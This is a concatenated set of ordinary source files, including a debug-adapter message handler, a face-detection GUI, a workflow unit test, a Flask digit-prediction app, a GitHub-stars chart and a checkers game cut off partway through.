)\n self._SetState( 'READ_HEADER' )\n return\n\n if len( self._buffer ) < content_length:\n # Need more data\n assert self._state == 'READ_BODY'\n return\n\n payload = str( self._buffer[ : content_length ], 'utf-8' )\n self._buffer = self._buffer[ content_length : ]\n\n message = json.loads( payload )\n\n self._logger.debug( 'Message received: {0}'.format( message ) )\n\n try:\n self._OnMessageReceived( message )\n finally:\n # Don't allow exceptions to break message reading\n self._SetState( 'READ_HEADER' )\n\n def _OnMessageReceived( self, message ):\n if not self._handler:\n return\n\n if message[ 'type' ] == 'response':\n request = self._outstanding_requests.pop( message[ 'request_seq' ] )\n\n if message[ 'success' ]:\n if request.handler:\n request.handler( message )\n else:\n reason = message.get( 'message' )\n if not reason:\n fmt = message.get( 'body', {} ).get( 'error', {} ).get( 'format' )\n if fmt:\n # TODO: Actually make this work\n reason = fmt\n else:\n reason = 'No reason'\n\n self._logger.error( 'Request failed: {0}'.format( reason ) )\n if request.failure_handler:\n request.failure_handler( reason, message )\n else:\n utils.UserMessage( 'Request failed: {0}'.format( reason ) )\n elif message[ 'type' ] == 'event':\n method = 'OnEvent_' + message[ 'event' ]\n if method in dir( self._handler ):\n getattr( self._handler, method )( message )\n else:\n utils.UserMessage( 'Unhandled event: {0}'.format( message[ 'event' ] ),\n persist = True )\n","sub_path":"python3/vimspector/debug_adapter_connection.py","file_name":"debug_adapter_connection.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"602968818","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\nfrom sklearn import linear_model\nimport sys\nfrom tqdm 
import tqdm\nfrom cycler import cycler\nimport string\nfrom itertools import cycle\n\n\ndef label_axes(fig, labels=None, loc=None, **kwargs):\n if labels is None:\n labels = string.ascii_lowercase\n labels = cycle(labels)\n if loc is None:\n loc = (-0.1, 1.1)\n axes = [ax for ax in fig.axes if ax.get_label() != '']\n for ax, lab in zip(axes, labels):\n ax.annotate('(' + lab + ')', size=16, xy=loc,\n xycoords='axes fraction',\n **kwargs)\n\n\nplt.style.use(['science', 'grid'])\nprop_cycle = plt.rcParams['axes.prop_cycle']\ncolors = prop_cycle.by_key()['color']\ncolors = [colors[3], colors[1], colors[0]]\ncolors_nipy1 = mpl.cm.nipy_spectral(np.linspace(0.1, 0.9, 6))\ncolors_nipy2 = mpl.cm.nipy_spectral(np.linspace(0.6, 0.9, 7))\ncolors_nipy = list(colors_nipy1[0:3]) + list(colors_nipy2[3:-2]) + list(colors_nipy1[-1:])\nplt.rcParams['axes.prop_cycle'] = cycler(color=colors)\n\ndf_tddft = pd.read_csv('TDDFT_MOPSSAM_test_data.csv')\ndf_mopssam = pd.read_csv('xtb_tddft_calib_data.csv')\n\nfig = plt.figure(num=2, figsize=[7, 4], dpi=300, clear=True)\nax = fig.add_subplot(1, 1, 1)\nplt.plot(df_tddft['S1'], df_mopssam['aug-cc-TDDFT'], '.', color=colors_nipy[1])\nx = np.linspace(0, 10, 100)\nplt.plot(x, x, 'k--')\nplt.xlim(2, 7)\nplt.ylim(2, 7)\nax.set_axisbelow(True)\nplt.grid(True)\nax.set_aspect('equal', adjustable='box')\n# plt.legend(markerscale=6, fontsize=14)\nplt.xlabel('Independent TD-DFT S$_1$ (eV)', fontsize=16)\nplt.ylabel('MOPSSAM S$_1$ (eV)', fontsize=16)\nplt.savefig('mopssam_S1_comp.png')\n","sub_path":"scripts/comp_TDDFT_settings.py","file_name":"comp_TDDFT_settings.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14519238","text":"import tkinter as tk\r\nimport cv2\r\nimport random\r\n\r\ndef webcam():\r\n video = cv2.VideoCapture(0)\r\n classificador = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt.xml')\r\n\r\n while True:\r\n conectado, frame = video.read()\r\n # print(conectado)\r\n # print(frame)\r\n\r\n frameCinza = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n facesDetectadas = classificador.detectMultiScale(frameCinza, minSize=(70, 70))\r\n for (x, y, l, a) in facesDetectadas:\r\n cv2.rectangle(frame, (x, y), (x + l, y + a), (0, 0, 255), 2)\r\n\r\n cv2.imshow('Video', frame)\r\n\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\n video.release()\r\n cv2.destroyAllWindows()\r\n\r\ndef face():\r\n classificador = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt.xml')\r\n #classificador = cv2.CascadeClassifier('cascades/haarcascade_frontalcatface.xml')\r\n #classificador = cv2.CascadeClassifier('cascades/cars.xml')\r\n #classificador = cv2.CascadeClassifier('cascades/relogios.xml')\r\n\r\n fotos = ['pessoas/j.jpg', 'pessoas/k.jpg','pessoas/fed.jpg','pessoas/h.jpg','pessoas/abc.jpg', 'pessoas/def.jpg', 'pessoas/cba.jpg', 'pessoas/beatles.jpg', 'pessoas/faceolho.jpg', 'pessoas/pessoas1.jpg', 'pessoas/pessoas2.jpg', 'pessoas/pessoas3.jpg', 'pessoas/pessoas4.jpg']\r\n #fotos = ['pessoas/carro1.jpg', 'pessoas/carro2.jpg', 'pessoas/carro3.jpg']\r\n #fotos = ['pessoas/gato1.jpg', 'pessoas/gato2.jpg', 'pessoas/gato3.jpg']\r\n\r\n imagem = cv2.imread(random.choice(fotos))\r\n imagemCinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY)\r\n\r\n facesDetectadas = classificador.detectMultiScale(imagemCinza, scaleFactor=1.1, minNeighbors=9, minSize=(30, 30))\r\n\r\n for (x, y, l, a) in facesDetectadas:\r\n imagem = cv2.rectangle(imagem, (x, y), (x + l, y + a), (0, 0, 255), 
2)\r\n\r\n cv2.imshow(\"Faces encontradas\", imagem)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\njanela = tk.Tk()\r\njanela.title('Captura de Faces')\r\njanela['bg'] = 'gray'\r\nbt1 = tk.Button(janela, width=20, text='Webcam', command=webcam)\r\nbt1.place(x=80, y=150)\r\nbt2 = tk.Button(janela, width=20, text='Imagens', command=face)\r\nbt2.place(x=80, y=180)\r\nbt3 = tk.Button(janela, width=20, text = 'Sair', command=janela.destroy)\r\nbt3.place(x=80, y=210)\r\njanela.geometry('300x300+200+200')\r\n\r\nimg = tk.PhotoImage(file='pessoas/tst.png')\r\nimg1 = tk.Label(janela, imag = img)\r\nimg1.place(x=100, y=30)\r\n#lb = tk.Label(janela, text='oi')\r\n#lb.place(x=100, y=100)\r\n\r\njanela.mainloop()\r\n\r\n","sub_path":"computerVision/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227319525","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2013 - Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral.db.v2.sqlalchemy import models\nfrom mistral.openstack.common import log as logging\nfrom mistral.tests import base\nfrom mistral.workbook import parser as spec_parser\nfrom mistral.workflow import direct_workflow as d_wf\nfrom mistral.workflow import states\nfrom mistral.workflow import utils as wf_utils\n\nLOG = logging.getLogger(__name__)\n\nWORKBOOK = \"\"\"\n---\nversion: '2.0'\n\nname: my_wb\n\nworkflows:\n wf1:\n type: direct\n\n tasks:\n task1:\n action: std.echo output=\"Hey\"\n publish:\n res1: <% $.task1 %>\n on-complete:\n - task2: <% $.res1 = 'Hey' %>\n - task3: <% $.res1 = 'Not Hey' %>\n\n task2:\n action: std.echo output=\"Hi\"\n\n task3:\n action: std.echo output=\"Hoy\"\n\"\"\"\n\n\nclass DirectWorkflowHandlerTest(base.BaseTest):\n def setUp(self):\n super(DirectWorkflowHandlerTest, self).setUp()\n\n wb_spec = spec_parser.get_workbook_spec_from_yaml(WORKBOOK)\n\n wf_ex = models.WorkflowExecution()\n wf_ex.update({\n 'id': '1-2-3-4',\n 'spec': wb_spec.get_workflows().get('wf1').to_dict(),\n 'state': states.IDLE\n })\n\n self.wf_ex = wf_ex\n self.wb_spec = wb_spec\n self.handler = d_wf.DirectWorkflowHandler(wf_ex)\n\n def _create_db_task(self, id, name, state):\n tasks_spec = self.wb_spec.get_workflows()['wf1'].get_tasks()\n\n task_ex = models.TaskExecution()\n task_ex.update({\n 'id': id,\n 'name': name,\n 'spec': tasks_spec[name].to_dict(),\n 'state': state\n })\n\n self.wf_ex.task_executions.append(task_ex)\n\n return task_ex\n\n def test_start_workflow(self):\n commands = self.handler.start_workflow()\n\n self.assertEqual(1, len(commands))\n self.assertEqual('task1', commands[0].task_spec.get_name())\n self.assertEqual(states.RUNNING, self.wf_ex.state)\n\n def test_on_task_result(self):\n self.wf_ex.update({'state': states.RUNNING})\n\n task1_db = self._create_db_task('1-1-1-1', 'task1', states.RUNNING)\n\n # Emulate finishing 'task1'.\n commands = self.handler.on_task_result(\n task1_db,\n 
wf_utils.TaskResult(data='Hey')\n )\n\n self.assertEqual(1, len(commands))\n self.assertEqual('task2', commands[0].task_spec.get_name())\n\n self.assertEqual(states.RUNNING, self.wf_ex.state)\n self.assertEqual(states.SUCCESS, task1_db.state)\n\n # Emulate finishing 'task2'.\n task2_db = self._create_db_task('1-1-1-2', 'task2', states.RUNNING)\n\n commands = self.handler.on_task_result(\n task2_db,\n wf_utils.TaskResult(data='Hi')\n )\n\n self.assertEqual(0, len(commands))\n\n self.assertEqual(states.SUCCESS, self.wf_ex.state)\n self.assertEqual(states.SUCCESS, task1_db.state)\n self.assertEqual(states.SUCCESS, task2_db.state)\n\n def test_stop_workflow(self):\n # TODO(rakhmerov): Implement.\n pass\n\n def test_resume_workflow(self):\n # TODO(rakhmerov): Implement.\n pass\n","sub_path":"mistral/tests/unit/workflow/test_direct_workflow.py","file_name":"test_direct_workflow.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396522720","text":"def merge_excel(input_filename,sheetname_list,output_filename='merge_log.csv',depth_name='DEPTH(m)'):\r\n '''\r\n \r\n '''\r\n import pandas as pd\r\n \r\n rawdata = dict()\r\n # read all excel files\r\n for sheetname in sheetname_list:\r\n rawdata[sheetname] = pd.read_excel(input_filename,sheetname=sheetname)\r\n \r\n # get the min_depth and max_depth \r\n min_depth = max([rawdata[elem][depth_name][0] for elem in rawdata])\r\n max_depth = min([rawdata[elem][depth_name][len(rawdata[elem])-1] for elem in rawdata])\r\n print('mindepth ',min_depth,'max depth ',max_depth)\r\n \r\n # data cleaning, select data between min and max depth\r\n for elem in rawdata:\r\n #print(elem,' raw length',len(rawdata[elem]))\r\n rawdata[elem] =rawdata[elem][(rawdata[elem][depth_name]<= max_depth) & (rawdata[elem][depth_name] >= min_depth) ] #\r\n rawdata[elem]=rawdata[elem].reset_index() #del rawdata[elem]['index']\r\n del rawdata[elem]['index']\r\n #print(elem,' processed length',len(rawdata[elem]))\r\n \r\n # merge to single dataframe \r\n df_logs_merge = pd.DataFrame()\r\n for i,elem in enumerate(rawdata):\r\n columns = list(rawdata[elem].columns.values) \r\n print(columns)\r\n if i>0: # only select depth once\r\n columns.remove(depth_name)\r\n df_logs_merge[columns] = rawdata[elem][columns]\r\n # save to csv file\r\n df_logs_merge.to_csv(output_filename,index=False)\r\n print('merge excel finished')","sub_path":"subfunctions/NMR_ML.py","file_name":"NMR_ML.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245590617","text":"# When running locally install requirements using\n# pip3 install -t lib -r requirements.txt\n# then run with\n# FLASK_APP=main.py FLASK_DEBUG=1 python -m flask run\n\nimport base64, re\nimport cloud_utils\nimport numpy as np\nfrom flask import Flask, jsonify, request, render_template\nfrom io import BytesIO\nfrom PIL import Image\nfrom googleapiclient import discovery\n\n\napp = Flask(__name__)\n\nservice = discovery.build('ml', 'v1')\n\n@app.route('/')\ndef index():\n return render_template('homepage.html')\n\n\"\"\"\nGeneral Landing Page for projects.\n\"\"\"\n@app.route('/projects')\ndef projects():\n return render_template('projects.html')\n\n\"\"\"\nLA county health scores project.\n\"\"\"\n@app.route('/health_scores')\ndef health_scores():\n return render_template('health_scores.html')\n\n\"\"\"\nDraw a digit and predict with MNIST layers 
project.\nIf RPC to ML-Engine spin up time is too long, host model locally.\n\"\"\"\n@app.route('/digits', methods=['GET', 'POST'])\ndef digits():\n if request.method == 'POST':\n dataURI = request.data.decode('UTF-8')\n image_data = re.sub('^data:image/png;base64,', '', dataURI)\n drawn_input = Image.open(BytesIO(base64.b64decode(image_data)))\n\n bounding_box = drawn_input.getbbox()\n if bounding_box is None:\n return jsonify(error=\"Draw something first\")\n\n # Expand bounding box, in order to center the image a bit more.\n expansion_coef = (-20, -20, 20, 20)\n enlarged_boundary = [sum(x) for x in zip(bounding_box, expansion_coef)]\n drawn_input = drawn_input.crop(enlarged_boundary)\n drawn_input = drawn_input.resize((28, 28), Image.ANTIALIAS)\n\n # For visualizing the crop and rescale.\n buffered = BytesIO()\n drawn_input.save(buffered, format=\"PNG\")\n data64 = base64.b64encode(buffered.getvalue())\n img_str = u'data:image/png;base64,'+ data64.decode('utf-8')\n\n pixels = list(drawn_input.getdata())\n # For the PNG the color is in the alpha channel. Normalize to [0,1].\n b_w = list(map(lambda rgba: rgba[3]/255.0, pixels))\n data = np.array(b_w)\n data.shape = (28, 28)\n data = data.tolist()\n # Prepare to send to ML Instance.\n req = {\"instances\": [{\"x\": data}]}\n try:\n prediction = cloud_utils.mnist_prediction(service, req)\n top_3 = sorted(enumerate(prediction['predictions'][0]['probabilities']),\n key=lambda x: x[1],\n reverse=True)[0:3]\n return jsonify(prediction=top_3, img_uri=img_str)\n except Exception:\n return jsonify(error=\"Error in the ML Instance, Please try again.\")\n return render_template('digits.html')\n","sub_path":"flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"497514715","text":"#most-starred Perl projects on github \nimport requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as lcs, LightenStyle as ls\n\nurl='https://api.github.com/search/repositories?q=language:Perl&sort=stars'\nr=requests.get(url)\n\nprint('Status code :',r.status_code)\n\nresponse_dict=r.json() \nprint('total_response_sum :',response_dict['total_count'])\n\nrepo_dicts=response_dict['items']\nprint('items sum :',len(repo_dicts))\n\n#repo_dict=repo_dicts[0]\n#print('\\nKeys_sum :',len(repo_dict))\n#print('name: ',repo_dict['name'])\n#print('selected information about each repository')\n#for repo_dict in repo_dicts:\n#\tprint('\\nname :',repo_dict['name'])\n#\tprint('owner :',repo_dict['owner']['login'])\n#\tprint('repository :',repo_dict['html_url'])\n#\tprint('description :',repo_dict['description'])\n\t\nnames,plot_dicts = [],[]\nfor repo_dict in repo_dicts:\n\tnames.append(repo_dict['name'])\n\tplot_dict={\n\t\t'value':repo_dict['stargazers_count'],\n\t\t'label':repo_dict['description'],\n\t\t'xlink':repo_dict['html_url'],\n\t}\n\tplot_dicts.append(plot_dict)\n\t\nmy_style=ls('#336699',base_style=lcs)\nmy_config=pygal.Config()\nmy_config.x_label_rotation=45\nmy_config.show_legend=False\nmy_config.title_font_size=30\nmy_config.label_font_size=20\nmy_config.major_label_font_size=30\nmy_config.truncate_label=15\nmy_config.show_y_guides=False\nmy_config.width=1260\n\nchart = pygal.Bar(my_config,style=my_style)\nchart.title='Most-Star Perl Projects on 
Github'\nchart.x_labels=names\n\nchart.add('',plot_dicts)\nchart.render_to_file('python_github_Perl.svg')\n","sub_path":"python_repos.py","file_name":"python_repos.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424609121","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/6/15 23:31\n# @Author : flyhawk\n# @Email : flyhawksz@163.com\n# @File : singleton.py\n# @Software: PyCharm\n\n\nclass Singleton(object):\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, 'instance'):\n cls.instance = super(Singleton, cls).__new__(cls)\n return cls.instance\n\n\ndef main():\n m1 = Singleton()\n m2 = Singleton()\n print(m1)\n print(m2)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1.Create Model/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349636688","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 2 13:11:09 2020\r\n\r\n@author: Kat\r\n\"\"\"\r\n#RUNNING MANY GAMES TO SEE THE BETTER COMPUTER METHOD\r\n\r\ndef main():\r\n import numpy as np\r\n import random\r\n \r\n #game board, 8 x 8\r\n def start_board(): #Create the board set-up with pieces in starting position\r\n board = []\r\n for i in range(8):\r\n board.append([' '] * 8) # 8 rows made of 8 empty strings. \r\n board[0][1] = 'O'\r\n board[0][3] = 'O'\r\n board[0][5] = 'O'\r\n board[0][7] = 'O'\r\n board[1][0] = 'O'\r\n board[1][2] = 'O'\r\n board[1][4] = 'O'\r\n board[1][6] = 'O'\r\n board[2][1] = 'O'\r\n board[2][3] = 'O'\r\n board[2][5] = 'O'\r\n board[2][7] = 'O'\r\n board[5][0] = 'X'\r\n board[5][2] = 'X'\r\n board[5][4] = 'X'\r\n board[5][6] = 'X'\r\n board[6][1] = 'X'\r\n board[6][3] = 'X'\r\n board[6][5] = 'X'\r\n board[6][7] = 'X'\r\n board[7][0] = 'X'\r\n board[7][2] = 'X'\r\n board[7][4] = 'X'\r\n board[7][6] = 'X'\r\n return board\r\n\r\n #this contains the \"rules\" for what kinds of moves are allowed. \r\n def valid_move_rules(board, marker, marker_king, xstart, ystart): \r\n #is a move to this space by this player legal? 
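\r\n #(illustrative example on the opening board: the 'X' pawn at (5, 0) can only step to\r\n #(4, 1), so this returns ([], [[4, 1]], []) -- captures, moves, mandatory jumps)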
\r\n #should return true if this move can be made\r\n #define player's and opponent's pieces\r\n if marker == 'X': \r\n opponent = 'O'\r\n opponent_king = '0'\r\n player = 1\r\n elif marker == 'O':\r\n opponent = 'X'\r\n opponent_king = 'K'\r\n player = 2 \r\n piece = board[xstart][ystart] #assigns a marker to the piece\r\n #start move scenario to check if there are legal moves to make\r\n moves_to_make = [] \r\n mandatory_moves_to_make = []\r\n piece_to_capture = [] #if a move to make jumps over and captures a piece, the piece captured will be the move -1 in the direction it came from and that space will be changed to empty\r\n if player == 1:\r\n if piece == marker: #piece is a pawn, can only move forward (up for X's)\r\n for xdirection, ydirection in [ [-1,-1], [-1,1]]: #the 2 ways this piece could move\r\n x = xstart\r\n y = ystart\r\n x = x + xdirection #check for diag moves\r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king): #move one more space in that direction to see if the piece can be jumped\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y]) #this stores the location of the capturable piece so it can be changed to ' ' later\r\n elif piece == marker_king: #piece is a king and can move in diag. forwards and back. \r\n for xdirection, ydirection in [ [-1,-1], [1,-1], [-1,1], [1,1]]: #the 4 ways this piece could move\r\n x = xstart\r\n y = ystart\r\n x = x + xdirection #check for diag moves\r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king):\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y])\r\n #player 2 can only move down the board so the x and y directions must be changed. 
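\r\n #(e.g. an 'O' pawn at (2, 1) checks [1,-1] and [1,1], reaching (3, 0) or (3, 2))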
\r\n elif player == 2:\r\n if piece == marker: \r\n for xdirection, ydirection in [ [1,-1], [1,1]]:\r\n x = xstart\r\n y = ystart\r\n x = x + xdirection \r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king):\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y]) \r\n elif piece == marker_king: #piece is a king, can move forwards and backwards \r\n for xdirection, ydirection in [ [-1,-1], [1,-1], [-1,1], [1,1]]: \r\n x = xstart\r\n y = ystart\r\n x = x + xdirection \r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king):\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y])\r\n if len(moves_to_make) == 0:\r\n return False #there were no valid moves\r\n return (piece_to_capture, moves_to_make, mandatory_moves_to_make)\r\n \r\n def is_on_board(x, y): #board bounds check (this helper was called throughout but never defined in the original file)\r\n return 0 <= x <= 7 and 0 <= y <= 7\r\n \r\n def is_move_valid(board, marker, marker_king, xstart, ystart): \r\n if valid_move_rules(board, marker, marker_king, xstart, ystart) != False:\r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n if len(moves_to_make) == 0:\r\n return False\r\n else:\r\n return moves_to_make\r\n else:\r\n return False\r\n \r\n def get_possible_moves(board, marker, marker_king):\r\n #creates a list of ALL the possible moves this player can make \r\n #need to show only jump moves in the event of a jump opportunity\r\n possible_moves = []\r\n mandatory_moves = []\r\n for x in range(8):\r\n for y in range(8):\r\n if is_move_valid(board, marker, marker_king, x, y) != False: #this checks every space on the board to see whether the piece at this location has a legal move, using the is_move_valid function. \r\n #if false, then there is no valid move from that space. \r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, x,y)\r\n possible_moves = possible_moves + moves_to_make #this creates a list of all the possible moves. \r\n mandatory_moves = mandatory_moves + mandatory_moves_to_make\r\n if len(mandatory_moves) != 0:\r\n possible_moves = mandatory_moves\r\n return possible_moves\r\n \r\n def get_movable_pieces(board, marker, marker_king):\r\n #creates a list of all the pieces this player can move \r\n #need to show only jump moves in the event of a jump opportunity\r\n movable_pieces = []\r\n mandatory_pieces = []\r\n for x in range(8):\r\n for y in range(8):\r\n if is_move_valid(board, marker, marker_king, x, y) != False: #this checks every space on the board to see whether the piece at this location has a legal move, using the is_move_valid function. \r\n #if false, then there is no valid move from that space. \r\n movable_pieces.append([x,y]) #this collects every piece that has at least one legal move. 
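\r\n #(pieces whose moves include a jump are gathered separately just below, because captures are mandatory in checkers)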
\r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, x,y)\r\n if len(mandatory_moves_to_make) != 0:\r\n mandatory_pieces.append([x,y])\r\n if len(mandatory_pieces) != 0:\r\n movable_pieces = mandatory_pieces\r\n for x in range(8):\r\n for y in range(8):\r\n for x, y in movable_pieces:\r\n if x > (x+1) or x < (x-1): #if the x val changes by more than 1, that means a piece could be jumped\r\n mandatory_pieces.append([x,y])\r\n if len(mandatory_pieces) != 0:\r\n movable_pieces = mandatory_pieces\r\n return movable_pieces\r\n \r\n def make_move(board, marker, marker_king, xstart, ystart, xnew, ynew): \r\n if board[xstart][ystart] == marker:\r\n board[xnew][ynew] = marker\r\n board[xstart][ystart] = ' '\r\n if board[xstart][ystart] == marker_king:\r\n board[xnew][ynew] = marker_king\r\n board[xstart][ystart] = ' '\r\n \r\n def capture_piece(board, marker, marker_king, xstart, ystart, xnew, ynew):\r\n #give location of piece that was captured\r\n if xnew == (xstart + 2):\r\n if ynew == (ystart + 2):\r\n board[(xstart+1)][(ystart+1)] = ' '\r\n if ynew == (ystart - 2):\r\n board[(xstart+1)][(ystart-1)] = ' '\r\n elif xnew == (xstart - 2):\r\n if ynew == (ystart + 2):\r\n board[(xstart-1)][(ystart+1)] = ' '\r\n if ynew == (ystart - 2):\r\n board[(xstart-1)][(ystart-1)] = ' '\r\n #this will be part of updating the board during gameplay\r\n \r\n def opposite_end(marker, xnew, ynew):\r\n #has the player's piece reached the opposite end of the board? true for p1 if in row 0 and for p2 if in row 7. This is part 1 of determining if the piece will become a king\r\n #note*limiting the piece to one that is not already a king prevents the computer from just moving one king piece back and forth the whole time\r\n if marker == 'X':\r\n if xnew == 0:\r\n return True\r\n else:\r\n return False\r\n if marker == 'O':\r\n if xnew == 7:\r\n return True\r\n else:\r\n return False\r\n \r\n def piece_becomes_king(board, marker, marker_king, xstart, ystart, xnew, ynew):\r\n #if the piece has reached the end of the board, it will become a king. If this is true, then in the gameplay, we will create an if loop where if this is true, then marker becomes marker_king. \r\n if board[xstart][ystart] == marker_king:\r\n return False\r\n if opposite_end(marker, xnew, ynew) == True:\r\n board[xnew][ynew] = marker_king\r\n return True #keeps pieces that are already kings from being marked as becoming a king \r\n \r\n def get_computer_move_1(board, marker, marker_king):\r\n pieces = get_movable_pieces(board, marker, marker_king) \r\n move_info = [] #this will contain the position of both the piece start and end location for a move. \r\n king_move_info = [] #groups moves that would give the player a king piece\r\n for x, y in pieces:\r\n xstart = x\r\n ystart = y\r\n piece = [xstart, ystart]\r\n if valid_move_rules(board, marker, marker_king, xstart, ystart) == False:\r\n break\r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n if len(mandatory_moves_to_make) != 0:\r\n moves_to_make = mandatory_moves_to_make\r\n for x, y in moves_to_make:\r\n xnew = x\r\n ynew = y\r\n move = [xnew, ynew]\r\n move_info.append([piece, move]) #many pieces will have two moves that they can make. 
    def get_computer_move_1(board, marker, marker_king):\r\n        pieces = get_movable_pieces(board, marker, marker_king) \r\n        move_info = [] #this will contain the position of both the piece start and end location for a move \r\n        king_move_info = [] #groups moves that would give the player a king piece\r\n        for x, y in pieces:\r\n            xstart = x\r\n            ystart = y\r\n            piece = [xstart, ystart]\r\n            if valid_move_rules(board, marker, marker_king, xstart, ystart) == False:\r\n                continue #skip this piece rather than abandoning the rest of the search (break would stop at the first dead piece)\r\n            piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n            if len(mandatory_moves_to_make) != 0:\r\n                moves_to_make = mandatory_moves_to_make\r\n            for x, y in moves_to_make:\r\n                xnew = x\r\n                ynew = y\r\n                move = [xnew, ynew]\r\n                move_info.append([piece, move]) #many pieces will have two moves that they can make. This way, if a piece can make 2 moves, there will be a [piece,move] for each\r\n                if piece_becomes_king(board, marker, marker_king, xstart, ystart, xnew, ynew) == True:\r\n                    king_move_info.append([piece, move])\r\n        if len(king_move_info) != 0:\r\n            move_info = king_move_info #a move that wins the computer a king is always chosen when one is available and legal\r\n        [xstart, ystart], [xnew, ynew] = random.choice(move_info) #pick a random move from move_info and unpack it into the start and end ('new') coordinates\r\n        return xstart, ystart, xnew, ynew\r\n    \r\n    def get_computer_move_2(board, marker, marker_king):\r\n        pieces = get_movable_pieces(board, marker, marker_king) \r\n        move_info = [] \r\n        end_space = []\r\n        #move pieces toward the middle and help the computer control the center of the board\r\n        for x, y in pieces:\r\n            xstart = x\r\n            ystart = y\r\n            piece = [xstart, ystart]\r\n            piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n            if len(mandatory_moves_to_make) != 0:\r\n                moves_to_make = mandatory_moves_to_make\r\n            for x, y in moves_to_make:\r\n                xnew = x\r\n                ynew = y\r\n                move = [xnew, ynew]\r\n                move_info.append([piece, move])\r\n        for x in range(len(move_info)):\r\n            end_space.append(move_info[x][1])\r\n        #find which move will put the player closest to the center \r\n        center = [3,4] #approx center of board\r\n        end = np.array(end_space) #convert end_space to an array\r\n        end = np.abs(end - center) #per-coordinate distance of each landing square from the center\r\n        end = np.min(end, axis=1)\r\n        find = np.min(end, axis=0) #which one is closest\r\n        val = end.tolist().index(find) #pull location of closest end space in list\r\n        [xstart, ystart], [xnew, ynew] = move_info[val] #use location to get the closest ending move\r\n        return xstart, ystart, xnew, ynew\r\n    \r\n    def get_computer_move(comp_level, board, marker, marker_king):\r\n        if comp_level == 1:\r\n            xstart, ystart, xnew, ynew = get_computer_move_1(board, marker, marker_king)\r\n        if comp_level == 2:\r\n            xstart, ystart, xnew, ynew = get_computer_move_2(board, marker, marker_king)\r\n        return xstart, ystart, xnew, ynew\r\n    \r\n    def get_winner(board):\r\n        #how many pieces 